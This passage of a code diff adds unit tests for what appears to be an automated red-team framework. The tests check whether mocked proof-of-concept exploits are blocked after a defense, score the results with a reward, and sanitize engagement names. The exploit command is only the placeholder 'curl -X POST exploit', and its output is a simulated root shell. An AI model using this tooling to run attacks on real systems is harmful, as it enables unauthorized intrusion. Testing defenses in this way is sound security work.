2/3 succeed → PASSED (signals still match).""" + call_count = {"n": 0} + + async def _run(command: str) -> tuple[str, str, int]: + if "exploit" in command.lower() or "PWNED" in command: + call_count["n"] += 1 + if call_count["n"] <= 2: + return ("PWNED root@target", "", 0) + return ("", "Permission denied", 1) + return ("matched", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = ExploitSpec( + finding_ref="FIND-RUN3B", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + runs=3, + min_success_rate=0.5, + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + + assert evidence.consensus is not None + assert evidence.consensus.n_success == 2 + assert evidence.consensus.success_rate >= 0.5 + assert evidence.re_attack_outcome == ReAttackOutcome.PASSED + + +# ── Test 11: invalid baseline → ERROR ───────────────────────────────────── + + +async def test_baseline_invalid_gives_error(tmp_path: Path) -> None: + """Invalid baseline (PoC fails pre-defense) → verify_blocked returns ERROR.""" + + async def _run(_: str) -> tuple[str, str, int]: + return ("", "Connection refused", 1) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = make_spec("FIND-BASE") + + baseline = await verifier.verify_baseline(spec) + assert baseline.valid is False + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post, baseline=baseline) + assert evidence.baseline_valid is False + assert evidence.re_attack_outcome == ReAttackOutcome.ERROR + + +# ── Test 12: impact_patterns populate evidence + reward.impact_confirmed ── + + +async def test_impact_patterns_populate_evidence(tmp_path: Path) -> None: + """impact_patterns matched in PoC output → impact_signals_matched + 
impact_confirmed.""" + + async def _run(command: str) -> tuple[str, str, int]: + if "exploit" in command.lower() or "PWNED" in command: + return ("PWNED uid=0 root@target", "", 0) + return ("matched", "", 0) + + verifier = EnvironmentVerifier(tmp_path, _run) + spec = ExploitSpec( + finding_ref="FIND-IMP", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + impact_patterns=["uid=0"], + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post = await verifier.capture_state(spec, phase=CheckPhase.POST_DEFENSE) + evidence = await verifier.verify_blocked(spec, pre=None, post=post) + assert "uid=0" in evidence.impact_signals_matched + reward = verifier.compute_reward(evidence) + assert reward.impact_confirmed is True + + +# ── Test 13: duplicate detection suppresses second run ──────────────────── + + +async def test_duplicate_detection_suppresses_second(tmp_path: Path) -> None: + """Same fingerprint on second call → duplicate_of set, outcome ERROR.""" + runner = make_runner(poc_response=("PWNED root@target", "", 0)) + verifier = EnvironmentVerifier(tmp_path, runner) + + spec_a = ExploitSpec( + finding_ref="FIND-DUP-A", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + target_host="10.0.0.5", + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + spec_b = ExploitSpec( + finding_ref="FIND-DUP-B", + poc_command="curl -X POST exploit", + success_patterns=["PWNED"], + target_host="10.0.0.5", + target_checks=[ + CommandOutputCheck(command="echo matched", pattern="matched", expect_match=True) + ], + ) + + post_a = await verifier.capture_state(spec_a, phase=CheckPhase.POST_DEFENSE) + _ = await verifier.verify_blocked(spec_a, pre=None, post=post_a) + + post_b = await verifier.capture_state(spec_b, phase=CheckPhase.POST_DEFENSE) + evidence_b = await verifier.verify_blocked(spec_b, pre=None, post=post_b) + assert 
evidence_b.duplicate_of is not None + assert evidence_b.re_attack_outcome == ReAttackOutcome.ERROR diff --git a/tests/unit/tools/test_complete_planning.py b/tests/unit/tools/test_complete_planning.py new file mode 100644 index 00000000..eb3acbab --- /dev/null +++ b/tests/unit/tools/test_complete_planning.py @@ -0,0 +1,41 @@ +"""Unit tests for ``decepticon.tools.interaction.complete_planning``.""" + +from __future__ import annotations + +from decepticon.tools.interaction.complete_planning import _sanitize_engagement_name + + +def test_sanitize_preserves_valid_slug(): + assert _sanitize_engagement_name("telenor-vdp") == "telenor-vdp" + + +def test_sanitize_empty_returns_fallback(): + assert _sanitize_engagement_name("") == "unnamed-engagement" + + +def test_sanitize_whitespace_only_returns_fallback(): + assert _sanitize_engagement_name(" ") == "unnamed-engagement" + + +def test_sanitize_strips_whitespace(): + assert _sanitize_engagement_name(" my-engagement ") == "my-engagement" + + +def test_sanitize_truncates_long_name(): + long_name = "x" * 100 + result = _sanitize_engagement_name(long_name) + assert len(result) == 64 + assert result == "x" * 64 + + +def test_sanitize_non_string_returns_fallback(): + assert _sanitize_engagement_name(None) == "unnamed-engagement" + assert _sanitize_engagement_name(123) == "unnamed-engagement" + assert _sanitize_engagement_name([]) == "unnamed-engagement" + + +def test_sanitize_preserves_at_boundary(): + """Exactly 64 chars should not be truncated.""" + exact = "a" * 64 + assert _sanitize_engagement_name(exact) == exact + assert len(_sanitize_engagement_name(exact)) == 64